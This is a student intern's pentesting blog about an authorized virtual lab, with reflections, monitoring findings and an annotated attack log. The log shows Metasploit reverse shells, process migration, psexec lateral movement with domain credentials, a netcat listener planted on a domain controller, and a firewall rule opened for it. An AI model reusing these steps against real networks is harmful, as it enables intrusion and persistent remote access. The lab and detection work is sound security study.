Friday, April 23, 2010

SimWitty Internship: Week 15

Well, this week wraps up my pentesting work for Simwitty. I have had a great time doing this work and I have learned quite a bit. In my classes we did some cursory overviews on pentesting, but never delved into it too deeply. This internship has really opened my eyes to the work that is involved in creating a successful penetration test. I think I made some hits and some misses which I would like to point out here.

Hits
  • I learned a huge amount about the Metasploit Framework and its capabilities.
  • I became more familiar with Windows PowerShell and it's use in automating tasks.
  • I was enlightened by having to think of all the various aspects of a system that would be changed by nefarious activity on the machine, and thus need to be monitored.
  • I became somewhat familiar with Microsoft SQL Server; how to set it up and work with it.
  • I learned quite abit concerning virtual machines and networks; what type of communication is possible, how it can be monitored.
  • I got to work on a project with professional people and feel like I made contributions to that project.

Misses
  • I was overambitious on what I could do in a given time frame and the monitoring aspects of the lab suffered for it.
  • I should have set up Snort to use output alert_full along with the database output. My SQL skills are limited (at this point) and I couldn't view the database entries in any way that made sense.
  • Installing IIS on srv-snort was a waste of time since I didn't have time to investigate it.
  • I used the database capabilities of Metasploit to organize and keep track of all the attack sessions but once again I don't know how to turn information in a database into usable information.
  • I should have installed something like the Dradis framework to keep better track of what I was doing and what were the results.
  • Every attack should have been correlated with information showing that it was either detected or not detected. I didn't set my lab up to properly do this.
  • I should have started off by finding a 'pentesting checklist' and adapted it to my lab. Why reinvent the wheel?

Final Thoughts
I think there are a lot of directions that an internship like this could take in the future. My lab was focused on client side attacks and pivoting, but I didn't really have time to investigate the pivoting aspect closely enough. That could be the target of a future internship. My attack was extremely noisy and obvious, perhaps someone could adapt it by concentrating more on stealth. An internship could possibly be done on creating a 'toolkit' for use once you have breached a host. I installed some programs but they were obvious and the installation was painful, can we use automation for toolkit installation? The lab network could be created with a "treasure" embeded somewhere within, and the intern's job is to go "treasure hunting". It would also be good to somehow tie in this lab setup with the actual Simwitty appliance, but this may be pushing resource usage on an interns machine.

I think that my lab setup (and documentation of it) could possibly aid future interns by reducing the time for planning and install. They now have a blueprint to follow (and improve) so that they can spend more time actually doing work within the lab environment. Finally I want to say thank you to everyone involved with Simwitty. Time is precious and the fact that you all give up some of yours to make this project work is praiseworthy. I have had a great time working on this project and hopefully can continue to be a contributor once the job issue is taken care of.
Posted by at 1 comment:

Monday, April 19, 2010

SimWitty Internship: Week 14

Monitoring is definitely the hard part. There is so much to watch on just one system, To name just a few examples:
File system changes
Account/Group changes
Directory service changes
Registry changes
Running processes/services
Now multiply that by the number of systems on the network and you have a real nightmare on your hands. The need for a Security Information Management System is pretty apparent. On my systems, I could see file system changes and account changes, etc. pretty easily. I doubt this would be the case on production systems where all kinds of activity is taking place.

Some clues that bad things were going on was fairly obvious: psexec is plainly visible in the system event log on srv-DC, it logs every time it starts or stops, but no information regarding what it was doing. Netcat all of a sudden showed up in the %SystemRoot% on srv-DC, Directories were added to C:\Program Files on wks-XP1, etc. I'm sure that the new event logging system on the Server 2008 OS is much better, the key is being able to find what you need among all the information. The following shows counts and types of activity in just one attack session from the two servers:


srv-DC
ID   Task Cat.                  Occurrences
------------------------------------------------------------------------------------------------------------
1102 Log clear                            1
4624 Logon                              360
4634 Logoff                             358
4648 Logon                                8
4662 Directory Service Access             3
4672 Special Logon                      284
4768 Kerberos Authentication Service     35
4769 Kerberos Service Ticket Operations 139
4776 Credential Validation                2
.......................................1190 tot

srv-SNORT
ID   Task Cat.              Occurrences
----------------------------------------------------------------
1102 Log clear                       1
4624 Logon                           2
4634 Logoff                          2
4648 Logon                           1
4656 Registry                        6
4658 Other Object Access Events      5
4662 Other Object Access Events     10
4663 Registry                        2
4672 Special Logon                   2
4688 Process Creation               26
4689 Process Termination            27
4696 Process Creation               17
5156 Filtering Platform Connection 215
5158 Filtering Platform Connection  45
...................................361 tot


I'm surprised that I didn't see any process creation/termination events on srv-DC... I thought I had auditing set properly. When I looked closer, I had auditing set in the GPO for the SimWitty OU but it apparently didn't affect srv-DC. I'm not sure if it was overridden by the local security policy or the default domain controller policy or what. I guess I should have been sure I turned auditing on everywhere. It's plain to see why they say one of the biggest reasons for breaches is through simple misconfiguration. The more complex a system is, the harder it is to be sure you have every little aspect of configuration right.
Posted by at No comments:

Wednesday, April 14, 2010

SimWitty Internship: Week 13 - Addendum

(NOTE: I apologize for the screwed up indentation and formatting in the latter part of this post but the editor for this blog sucks and I don't have time to do all the html by hand)

In my last post I noted that I would continue with the attempted compromise for a couple more days. I'm happy to report that I was able to succeed in getting a hole through the gateway firewall and a netcat listener on an internal workstation, thanks to Mark Russinovich and Psexec. The following is an annotated scrollback buffer from the attack machine wks-Matriux:

/* My scrollback didn't capture everything... this is the tail end of output from ps shortly after a meterpreter session was created */

1780 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1560 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1976 svhost77.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\svhost77.exe

meterpreter > shell
Process 1644 created.
Channel 6 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program files\ps>c:\bin\whoami
c:\bin\whoami
TEST\usr1

/* This is the start of my attempts to work with psexec, took a bit of fiddling to get it right. It is important to use the /accepteula argument on first run, or a window pops up that you can't see or respond to. After that, I dont' think it's necessary */

C:\Program files\ps>psexec /accepteula \\srv-dc -u usr1 -p usr1 c:\windows\system32\netsh.exe routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

psexec /accepteula \\srv-dc -u usr1 -p usr1 c:\windows\system32\netsh.exe routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

/* I'll leave this first banner in, because Mark deserves credit. I will eliminate the rest though (should have a -q switch?) */

PsExec v1.59 - Execute processes remotely
Copyright (C) 2001-2005 Mark Russinovich
Sysinternals - www.sysinternals.com

Logon failure: unknown user name or bad password.
PsExec could not start c:\windows\system32\netsh.exe on WKS-XP1:

C:\Program files\ps>psexec /accepteula \\192.168.2.1 -u usr1 -p usr1 c:\windows\system32\netsh.exe routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

psexec /accepteula \\192.168.2.1 -u usr1 -p usr1 c:\windows\system32\netsh.exe routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

Logon failure: unknown user name or bad password.
PsExec could not start c:\windows\system32\netsh.exe on WKS-XP1:

C:\Program files\ps>psexec /accepteula \\192.168.2.1 -u usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

psexec /accepteula \\192.168.2.1 -u usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

Logon failure: unknown user name or bad password.
PsExec could not start netsh on WKS-XP1:

/* I finally figured you had to supply the usr name in DOMAIN\user format. I cheated a little since psexec doesn't "pass the hash" I used the real password. I think this is acceptable though, since the attacker already has the password hashes and would probably be able to crack the password. If nothing else, I could have created my own user and supplied the password, added it to the domain admin group, etc. */

C:\Program files\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 whoami

psexec \\srv-DC -u TEST\usr1 -p usr1 whoami

whoami exited on srv-DC with error code 0.

C:\Program files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

NAT must be installed first.
netsh exited on WKS-XP1 with error code 0.

/* I am not quite sure why it was telling me this. Maybe because you have to be elevated to run the command, but as you'll see later, it warns me that I am not elevated. */

C:\Program files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp

The following command was not found: advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp.

netsh exited on WKS-XP1 with error code 1.

C:\Program files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh "advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp"

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh "advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp"

The following command was not found: "advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp".

netsh exited on WKS-XP1 with error code 1.

C:\Program files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 "netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp"

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 "netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp"

The system cannot find the file specified.
Starting netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=
PsExec could not start netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp on WKS-XP1:

C:\Program files\ps>copy c:\bin\nc.exe .
copy c:\bin\nc.exe .
1 file(s) copied.

C:\Program files\ps>dir
dir
Volume in drive C has no label.
Volume Serial Number is F476-9322

Directory of C:\Program files\ps

04/13/2010 11:05 PM dir .
04/13/2010 11:05 PM dir ..
04/13/2010 10:41 PM 7,005 Eula.txt
12/29/2004 02:07 PM 61,440 nc.exe
04/13/2010 10:41 PM 143,360 psexec.exe
04/13/2010 10:41 PM 64,072 Pstools.chm
04/13/2010 10:42 PM 960 Pstools_README.TXT
5 File(s) 276,837 bytes
2 Dir(s) 8,279,678,976 bytes free

/* Here I copied netcat into the current directory, just to make it easier to work with. I then ran an nmap scan on srv-dc to see what ports were available. */

C:\Program files\ps>cd ..
cd ..

C:\Program Files>cd nmap
cd nmap

C:\Program Files\nmap>nmap -sS -F -n -v 192.168.2.1
nmap -sS -F -n -v 192.168.2.1

Starting Nmap 5.21 ( http://nmap.org ) at 2010-04-13 23:08 Central Standard Time
Initiating ARP Ping Scan at 23:08
Scanning 192.168.2.1 [1 port]
Completed ARP Ping Scan at 23:08, 0.85s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 23:08
Scanning 192.168.2.1 [100 ports]
Discovered open port 53/tcp on 192.168.2.1
Discovered open port 135/tcp on 192.168.2.1
Discovered open port 445/tcp on 192.168.2.1
Discovered open port 49157/tcp on 192.168.2.1
Discovered open port 49155/tcp on 192.168.2.1
Discovered open port 389/tcp on 192.168.2.1
Discovered open port 49154/tcp on 192.168.2.1
Discovered open port 88/tcp on 192.168.2.1
Discovered open port 5357/tcp on 192.168.2.1
Completed SYN Stealth Scan at 23:08, 2.68s elapsed (100 total ports)
Nmap scan report for 192.168.2.1
Host is up (0.027s latency).
Not shown: 91 filtered ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
389/tcp open ldap
445/tcp open microsoft-ds
5357/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
MAC Address: 08:00:27:33:48:CD (Cadmus Computer Systems)

Read data files from: C:\Program Files\nmap
Nmap done: 1 IP address (1 host up) scanned in 4.21 seconds
Raw packets sent: 193 (8490B) | Rcvd: 11 (482B)

C:\Program Files\nmap>cd ..\ps
cd ..\ps

/* In the following few lines, I was trying to copy nc.exe over to srv-dc and execute it. I guess I don't grasp the concept of how psexec uses the -c argument */

C:\Program Files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 -c nc.exe -n -t -L -s 192.168.2.1 -p 5357

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 -c nc.exe -n -t -L -s 192.168.2.1 -p 5357

Can't grab 192.168.2.1:5357 with bind
nc.exe exited on WKS-XP1 with error code 1.

C:\Program Files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 -c nc.exe -n -t -L -s 192.168.2.1 -p 49157

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 -c nc.exe -n -t -L -s 192.168.2.1 -p 49157

Can't grab 192.168.2.1:49157 with bind
nc.exe exited on WKS-XP1 with error code 1.

C:\Program Files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -h

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -h

The system cannot find the file specified.
PsExec could not start nc.exe on WKS-XP1:

/* Here I decided to just try and do a direct copy. When that failed I tried to map the Admin$ share. That also failed, I think because I was using an impersonation token rather than actually running in a process owned by usr1. */

C:\Program Files\ps>copy nc.exe \\svr-DC\admin$
copy nc.exe \\svr-DC\admin$
The network path was not found.
0 file(s) copied.

C:\Program Files\ps>net use z: \\svr-DC\admin$
net use z: \\svr-DC\admin$

The server is not configured for remote administration.
More help is available by typing NET HELPMSG 3743.

C:\Program Files\ps>exit
meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0
400 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
612 csrss.exe
636 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
688 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
700 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
860 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe
876 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
960 svchost.exe
1056 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1116 svchost.exe
1216 svchost.exe
1416 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1740 tlntsvr.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\tlntsvr.exe
348 explorer.exe x86 0 TEST\usr1 C:\WINDOWS\Explorer.EXE
480 alg.exe
572 VBoxTray.exe x86 0 TEST\usr1 C:\WINDOWS\system32\VBoxTray.exe
1780 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1560 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1976 svhost77.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\svhost77.exe

meterpreter > migrate 348
[*] Migrating to 348...
[*] Migration completed successfully.
meterpreter > shell
Process 344 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\usr1.TEST>net use * \\192.168.2.1\admin$
net use * \\192.168.2.1\admin$

Drive Z: is now connected to \\192.168.2.1\admin$.
The command completed successfully.

/* It worked after migrating into a process owned by usr1 */

C:\Documents and Settings\usr1.TEST>cd c:\progra~1\ps
cd c:\progra~1\ps

C:\PROGRA~1\ps>copy nc.exe z:\
copy nc.exe z:\
1 file(s) copied.

C:\PROGRA~1\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 49157

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 49157

The system cannot find the file specified.
PsExec could not start nc.exe on WKS-XP1:

/* huh? */

C:\PROGRA~1\ps>dir
dir
Volume in drive C has no label.
Volume Serial Number is F476-9322

Directory of C:\PROGRA~1\ps

04/13/2010 11:05 PM dir .
04/13/2010 11:05 PM dir ..
04/13/2010 10:41 PM 7,005 Eula.txt
12/29/2004 02:07 PM 61,440 nc.exe
04/13/2010 10:41 PM 143,360 psexec.exe
04/13/2010 10:41 PM 64,072 Pstools.chm
04/13/2010 10:42 PM 960 Pstools_README.TXT
5 File(s) 276,837 bytes
2 Dir(s) 8,279,658,496 bytes free

C:\PROGRA~1\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -h

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -h

The system cannot find the file specified.
PsExec could not start nc.exe on WKS-XP1:

C:\PROGRA~1\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 c:\windows\nc.exe -h

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 c:\windows\nc.exe -h

The system cannot find the file specified.
PsExec could not start c:\windows\nc.exe on WKS-XP1:

C:\PROGRA~1\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 49157

psexec \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 49157

Can't grab 192.168.2.1:49157 with bind
nc.exe exited on srv-DC with error code 1.

/* Was the AcceptEULA screwing things up? now it runs on srv-dc */

C:\PROGRA~1\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 9999

psexec \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 9999

^C
Terminate channel 1? [y/N] n
[-] Error running command shell: SignalException SIGUSR1

/* In the preceding, netcat started running, but I had no way to interact with it. Ctrl C tends to end up killing the whole session rather than just the command shell channel. I discovered a way to avoid this on Matriux (Ubuntu): Press alt+F2 and it pops up krunner (I think that's what it's called) click the icon just left of the text box and you get a thing much like Process Explorer. Find metasploit under Konsole (running as ruby), right click it and send it the SIGUSR1 signal and it usually puts you back into the meterpreter session. */

meterpreter > rev2self
meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0
400 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
612 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
636 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
688 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
700 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
860 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe
876 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
960 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1056 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1116 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1216 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1416 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1740 tlntsvr.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\tlntsvr.exe
348 explorer.exe x86 0 TEST\usr1 C:\WINDOWS\Explorer.EXE
480 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
572 VBoxTray.exe x86 0 TEST\usr1 C:\WINDOWS\system32\VBoxTray.exe
1780 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1560 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1976 svhost77.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\svhost77.exe
344 cmd.exe x86 0 TEST\usr1 C:\WINDOWS\system32\cmd.exe
1776 psexec.exe x86 0 TEST\usr1 C:\PROGRA~1\ps\psexec.exe

meterpreter > shell
Process 1564 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\usr1.TEST>c:\bin\whoami
c:\bin\whoami
TEST\usr1

C:\Documents and Settings\usr1.TEST>exit
meterpreter > rev2self
meterpreter > getuid
Server username: TEST\usr1
meterpreter > shell
Process 1540 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\usr1.TEST>cd c:\program files\ps
cd c:\program files\ps

C:\Program Files\ps>nc -vv -n 192.168.2.1 9999
nc -vv -n 192.168.2.1 9999
hello
(UNKNOWN) [192.168.2.1] 9999 (?): TIMEDOUT
sent 0, rcvd 0: NOTSOCK

C:\Program Files\ps>hello
'hello' is not recognized as an internal or external command,
operable program or batch file.

C:\Program Files\ps>exit
meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0
400 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
612 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
636 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
688 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
700 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
860 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe
876 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
960 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1056 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1116 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1216 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1416 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1740 tlntsvr.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\tlntsvr.exe
348 explorer.exe x86 0 TEST\usr1 C:\WINDOWS\Explorer.EXE
480 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
572 VBoxTray.exe x86 0 TEST\usr1 C:\WINDOWS\system32\VBoxTray.exe
1780 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1560 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1976 svhost77.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\svhost77.exe
344 cmd.exe x86 0 TEST\usr1 C:\WINDOWS\system32\cmd.exe
1776 psexec.exe x86 0 TEST\usr1 C:\PROGRA~1\ps\psexec.exe

meterpreter > kill 1776
Killing: 1776
meterpreter > kill 344
Killing: 344
meterpreter > shell
Process 180 created.
Channel 4 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\usr1.TEST>cd c:\program files\ps
cd c:\program files\ps

C:\Program Files\ps>psexec \\server-dc -u TEST\usr1 -p usr1 tasklist

psexec \\server-dc -u TEST\usr1 -p usr1 tasklist

The network path was not found.
Couldn't access server-dc:
Make sure that the default admin$ share is enabled on server-dc.

C:\Program Files\ps>net use * /delete
net use * /delete
You have these remote connections:

Z: \\192.168.2.1\admin$

\\192.168.2.50\IPC$
\\srv-DC\IPC$
Continuing will cancel the connections.
Do you want to continue this operation? (Y/N) [N]:
No valid response was provided.

C:\Program Files\ps>net use Z: /delete
net use Z: /delete
Z: was deleted successfully.

C:\Program Files\ps>psexec \\svr-dc -u TEST\usr1 -p usr1 tasklist

psexec \\svr-dc -u TEST\usr1 -p usr1 tasklist

The network path was not found.
Couldn't access svr-dc:
Make sure that the default admin$ share is enabled on svr-dc.

C:\Program Files\ps>ping -n 2 192.168.2.1
ping -n 2 192.168.2.1

Pinging 192.168.2.1 with 32 bytes of data:

Reply from 192.168.2.1: bytes=32 time=2ms TTL=128
Reply from 192.168.2.1: bytes=32 time=5ms TTL=128

Ping statistics for 192.168.2.1:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 2ms, Maximum = 5ms, Average = 3ms

C:\Program Files\ps>exit
meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0
400 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
612 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
636 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
688 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
700 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
860 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe
876 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
960 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1056 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1116 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1216 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1416 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1740 tlntsvr.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\tlntsvr.exe
348 explorer.exe x86 0 TEST\usr1 C:\WINDOWS\Explorer.EXE
480 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
572 VBoxTray.exe x86 0 TEST\usr1 C:\WINDOWS\system32\VBoxTray.exe
1780 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1560 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1976 svhost77.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\svhost77.exe

meterpreter > exit

[*] Meterpreter session 1 closed. Reason: User exit

/* Things had gotten all screwed up by this point, with zombie processes running on srv-dc and
wks-xp1 so I killed the session, killed the zombies manually, and restarted the exploit.
*/

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.188:31337
[*] Starting the payload handler...
^C[-] Exploit failed:
[*] Exploit completed, but no session was created.
msf exploit(handler) > jobs

Jobs
====

No active jobs.

msf exploit(handler) > sessions

Active sessions
===============

No active sessions.

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.188:31337
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.1.250
[*] Meterpreter session 2 opened (192.168.1.188:31337 -> 192.168.1.250:62571)
[*] AutoAddRoute: Routing new subnet 192.168.2.0/255.255.255.0 through session 2
[-] The 'stdapi' extension has already been loaded.

meterpreter > shell
Process 1028 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\TEMP>cd c:\program files\ps
cd c:\program files\ps

C:\Program Files\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 "netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp

psexec \\srv-DC -u TEST\usr1 -p usr1 "netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp

The system cannot find the file specified.
Starting netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=
PsExec could not start netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp on srv-DC:

C:\Program Files\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 "netsh advfirewall firewall add rule name="jah-netcat" di

psexec \\srv-DC -u TEST\usr1 -p usr1 "netsh

netsh exited on srv-DC with error code 0.

/* The preceding appears weird because I had copied the command into the console, realized it was wrong, and tried to correct it. The console wouldn't let me backspace past the beginning of the line so I ended up running a "half command" via psexec. I do see that it works though. I finally got the quoting right. I think the dash in the name argument was screwing things up and needed to be quoted. */

C:\Program Files\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp

psexec \\srv-DC -u TEST\usr1 -p usr1 netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp

The requested operation requires elevation.
netsh exited on srv-DC with error code 1.

C:\Program Files\ps>psexec \\srv-DC -u TEST\usr1 -s -p usr1 netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp

psexec \\srv-DC -u TEST\usr1 -s -p usr1 netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp

Ok.
netsh exited on srv-DC with error code 0.

/* Woo hoo! added the -s argument to run as system and it worked I now have a firewall rule in place */

